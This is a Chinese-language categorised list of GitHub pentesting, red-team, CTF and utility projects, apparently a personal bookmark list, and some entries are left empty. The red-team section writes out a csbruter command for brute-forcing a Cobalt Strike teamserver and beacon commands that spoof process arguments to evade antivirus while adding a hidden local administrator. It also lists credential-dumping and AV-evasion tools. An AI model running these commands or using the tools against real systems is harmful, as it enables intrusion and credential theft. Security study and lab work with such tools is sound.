-
渗透环境
- sqli-labs
- SQLI labs to test error based, Blind boolean based, Time based.
- vulhub
- Pre-Built Vulnerable Environments Based on Docker-Compose
- commando-vm
- upload-labs
- ptf
- juice-shop
- commix-testbed
- Viper
- Viper (炫彩蛇) 图形化内网渗透工具
- vulfocus
- dvta
- VulnHub
- DC Serial
- DC 系列靶场,难度简单至中等,可以学习各种提权和CMS漏洞利用,推荐初学者挑战
- symfonos Serial
- 挺有难度的靶场,内容丰富,难度中等,漏洞利用内容很多,推荐有一定经验者挑战
- Kioptrix Serial
- Kioptrix 系列靶场,难度简单至中等,推荐初学者挑战
- DC Serial
- sqli-labs
-
好用的软件
- CopyTranslator
- Foreign language reading and translation assistant based on copy and translate.
- gotop
- A terminal based graphical activity monitor inspired by gtop and vtop
- RssHub
- Netch
- CopyTranslator
-
书籍
- interpy-zh
- 《Python进阶》(Intermediate Python 中文版)
- awesome-machine-learning
- A curated list of awesome Machine Learning frameworks, libraries and software.
- APT_REPORT
- CTF-All-In-One
- interview_internal_reference
- 2021年最新总结,阿里,腾讯,百度,美团,头条等技术面试题目,以及答案,专家出题人分析汇总。
- AppSecEzine
- Pentest-Notes
- 《内网安全攻防-渗透测试实战指南》一些技术点概括
- sec-chart
- collection-document
- 2020-Vulnerabilities
- Chinese-translation-ATT-CK-framework
- ATT&CK 框架图中文翻译版
- AllVideoPocsFromHackerOne
- Report_Public
- pentest-playbook
- sec-dev-in-action-src
- sangfor
- 个人维护的安全知识框架,内容包括不仅限于 web安全、工控安全、取证、应急、蓝队设施部署、后渗透、Linux安全、各类靶机writup
- Information_Collection_Handbook
- Handbook of information collection for penetration testing and src
- 1earn
- 个人维护的安全知识框架,内容包括不仅限于 web安全、工控安全、取证、应急、蓝队设施部署、后渗透、Linux安全、各类靶机writup
- interpy-zh
-
平台
- spug
- 开源运维平台:面向中小型企业设计的轻量级无Agent的自动化运维平台,整合了主机管理、主机批量执行、主机在线终端、文件在线上传下载、应用发布部署、在线任务计划、配置中心、监控、报警等一系列功能。
- dnSpy
- .NET debugger and assembly editor
- AssetManage
- HFish
- DBJ
- spug
-
渗透测试
- Micro8
- PenetrationTest-Tips
- 渗透测试,渗透测试小技巧,渗透测试Tips
- thinkphp-RCE-POC-Collection
- awesome-shodan-queries
- metasploit-framework
- WeblogicScan
- Weblogic一键漏洞检测工具
- WeblogicScan
- 增强版WeblogicScan、检测结果更精确、插件化、添加CVE-2019-2618,CVE-2019-2729检测,Python3支持
- weblogic_memshell
- 适用于weblogic的无shell的内存马
- WeblogicEnvironment
- Weblogic环境搭建工具
- CMS-Hunter
- CMS漏洞测试用例集合
- TideFinger
- 指纹识别小工具,汲取整合了多个web指纹库,结合了多种指纹检测方法,让指纹检测更快捷、准确。
- Blasting_dictionary
- 爆破字典
- fuzzDicts
- Web Pentesting Fuzz 字典
- DefaultCreds-cheat-sheet
- commonspeak2-wordlists
- MDUT
- 一款用于数据库利用工具,集合了多种主流的数据库类型
- 子域名
- subDomainsBrute
- Findomain
- the-art-of-subdomain-enumeration
- SubDomainizer
- Autoscanner
- 自动化爆破子域名,并遍历所有端口寻找http服务,并使用crawlergo、dirsearch、xray等工具扫描并集成报告;支持动态添加扫描到的域名至任务;
- subdomain_shell
-
javascript
- LinkFinder
- SecretFinder
- JSParser
- JSFScan.sh
- pentest-tools
- Custom pentesting tools
- awvs13_batch_py3
- 针对 AWVS扫描器开发的批量扫描脚本,支持联动xray、burp、w13scan等被动批量
- AWVS-13-SCAN-PLUS
- Burp插件
- Penetration_Testing_POC
- Middleware-Vulnerability-detection
- PENTESTING-BIBLE
- Dictionary-Of-Pentesting
- PocList
- LSpider
- LSpider 一个为被动扫描器定制的前端爬虫
- xray
- 一款完善的安全评估工具,支持常见 web 安全问题扫描和自定义 poc
- rad-xray
- xray+rad批量主动扫描
- xray-poc-generation
- Fofa-gui
- Fofa-collect
- fofa-dump
- FofaSpider
- XrayFofa
- Fofa-collect1.4
- ARL
- 资产侦察灯塔系统旨在快速侦察与目标关联的互联网资产,构建基础资产信息库。
- meg
- gf
- Gf-Patterns
- 端口扫描
- blackwater
- Blaskwate rust port scanner tool
- railgun
- LangNetworkTopologys
- 端口扫描,指纹识别,网站探测,结果整理
- NmapTools
- TXPortMap
- fastscan
- httpscan
- 一个爬虫式的网段Web主机发现小工具
- blackwater
- 目录扫描
- gau
- SharpDllProxy
- 指纹识别
- Eeyes
- 快速筛选真实IP并整理为C段
- waf
- godnslog
- FavFreak
- Making Favicon.ico based Recon Great again !
- pwndoc
- Pentest Report Generator
- nuclei
- nuclei-templates
- shiro_attack
- shiro-check
- shiro-exploit
- fileleak
- 一款敏感文件泄漏检测工具
- webshell
- DuckMemoryScan
- 检测绝大部分所谓的内存免杀马
- vulmap
- RedisWriteFile
- company-crawler
- 天眼查爬虫&企查查爬虫,指定关键字爬取公司信息
- cSubsidiary
- 利用天眼查查询企业子公司
- web-log-parser
- An open source analysis web log tool
- vulnReport
- 安服自动化脚本:包括 Nessus、天境主机漏洞扫描6.0、APPscan、awvs等漏洞报告的整理,Google翻译等
- nsfocus_all
- swagger-exp
- swagger-hack
- dumpall
- 一款信息泄漏利用工具,适用于.git/.svn源代码泄漏和.DS_Store泄漏
- dedecmscan
- 织梦全版本漏洞扫描
- MYSQL_SQL_BYPASS_WIKI
- apk
- apkleaks
- Scanning APK file for URIs, endpoints & secrets.
- apkleaks
- apk
-
红蓝攻防
-
- 利用 NTLMSSP 探测 Windows 信息
-
- A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.
-
- App that generates PowerShell dropper scripts for .NET executables
-
- These profiles work with Cobalt Strike 3.x.
-
端口转发
- iox
- nps
- 一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等
- frpModify
- FrpProPlugin
- pystinger
- 毒刺(pystinger)通过webshell实现内网SOCK4代理,端口映射.
- TFirewall
- 防火墙出网探测工具,内网穿透型socks5代理
- Venom
- Stowaway
- smarGate
- 内网穿透,c++实现,无需公网IP,小巧,易用,快速,安全,最好的多链路聚合(p2p+proxy)模式,不做之一…这才是你真正想要的内网穿透工具!
-
C/S插件
-
- Cobalt Strike teamserver detection.
-
- RDP日志取证&清除
-
爆破 cobaltstrike teamserver
-
git clone https://github.com/ryanohoro/csbruter cd csbruter cat wordlist.txt | python3 csbruter.py xxx.xxx.xxx.xxx
-
-
argue
-
绕过杀软添加用户
-
argue 进程参数欺骗 argue [command] [fake arguments] argue 命令 假参数 欺骗某个命令参数 argue [command] argue 命令 取消欺骗某个命令参数 beacon> argue net1 /bypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypass beacon> run net1 user what t1!@#1dsdfq3 /add beacon> run net1 localgroup administrators what /add
-
-
横向移动
-
凭证提取
- RdpThief
- Extracting Clear Text Passwords from mstsc.exe using API Hooking.
- HackBrowserData
- 一款可全平台运行的浏览器数据导出解密工具。
- loginlog_windows
- 读取登录过本机的登录失败或登录成功的所有计算机信息,在内网渗透中快速定位运维管理人员。
- 360SafeBrowsergetpass
- 一键辅助抓取360安全浏览器密码的CobaltStrike脚本以及解密小工具
- ListRDPConnections
- C# 读取本机对外RDP连接记录和其他主机对该主机的连接记录,从而在内网渗透中获取更多可通内网网段信息以及定位运维管理人员主机
- Sunflower_get_Password
- 一款针对向日葵的识别码和验证码提取工具
- SharpDecryptPwd
- 对密码已保存在 Windwos 系统上的部分程序进行解析,包括:Navicat,TeamViewer,FileZilla,WinSCP,Xmangager系列产品(Xshell,Xftp)。
- mimipenguin
- A tool to dump the login password from the current linux user
- RdpThief
-
- The great impacket example scripts compiled for Windows
-
AD
- Active-Directory-Exploitation-Cheat-Sheet
- LAPSDumper
- SharpShares
- 多线程的C#.NET程序集,用于列举域中可访问的网络共享。
-
bypass
- GIVINGSTORM
- ImgLoaderShellCode
- BypassAV
- SharpAVKB
- SharpZip
- FourEye
- AV Evasion Tool For Red Team Ops
- NimShellCodeLoader
- shellcodeloader
- Cooolis-ms
- ShellCodeFramework
- charlotte
- ScareCrow
- Payload creation framework designed around EDR bypass.
- X-AV
- X系列安全工具-AV免杀框架-BypassAV
-
提权
- SweetPotato
- CVE-2020-16939
- PoC code for CVE-2020-16939 Windows Group Policy DACL Overwrite Privilege Escalation
- getSystem
- webshell下提权执行命令
- SystemToken
- CVE-2021-1732-Exploit
- CVE-2021-1732 Windows 本地权限提升漏洞
- byeintegrity-uac
- 通过劫持位于本机映像缓存中的DLL绕过UAC
- CVE-2021-21551
-
内网扫描
-
- 为安全应急响应人员对Linux主机排查时提供便利,实现主机侧Checklist的自动全面化检测,根据检测结果自动数据聚合,进行黑客攻击路径溯源。
-
添加用户
- netuser
- 使用windows api添加,删除用户,可用于net无法使用时
- netuser
-
远控
-
-
exp
- JBoss-exp
- Apache-Durid-RCE
- windows-kernel-exploits
- Windows平台提权漏洞集合
- Exploits
- CVE-2020-17519
- Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)
- CVE-2020-36179
- CVE-2020-36179~82 Jackson-databind SSRF&RCE
- CoreMailUploadRce
- CVE-2021-27928
-
POC
-
src
-
ctf
- Writeups
- ctf-challenges
- CTF-GeekFZ
- CTFTools
- CaptfEncoder
- CaptfEncoder是一款可扩展跨平台网络安全工具套件,提供网络安全相关编码转换、古典密码、密码学、非对称加密、特殊编码、杂项等工具,并聚合各类在线工具。
-
其他
- ChinaMobilePhoneNumberRegex
- 一组匹配中国大陆手机号码的正则表达式。
- hacknical
- hacknical 通过抓取用户的 github 数据,来形成一个可视化展示的 github 分析报告,以此辅助用户更好的完善自己的简历。
- GitHubDaily
- GitHubDaily 分享内容定期整理与分类。
- HelloGitHub
- 分享 GitHub 上有趣、入门级的开源项目
- HELK
- dotfiles
- .vimrc, .bashrc etc
- awesome-security-weixin-official-accounts
- 网络安全类公众号推荐
- lsd
- powerlevel10k
- A Zsh theme
- lolcat
- neofetch
- zhaopp
- PowerToys
- Windows system utilities to maximize productivity
- TuBi
- QuickLook
- screenity
- Cyberbrain
- Python debugging, redefined.
- notion-enhancer
- ChinaMobilePhoneNumberRegex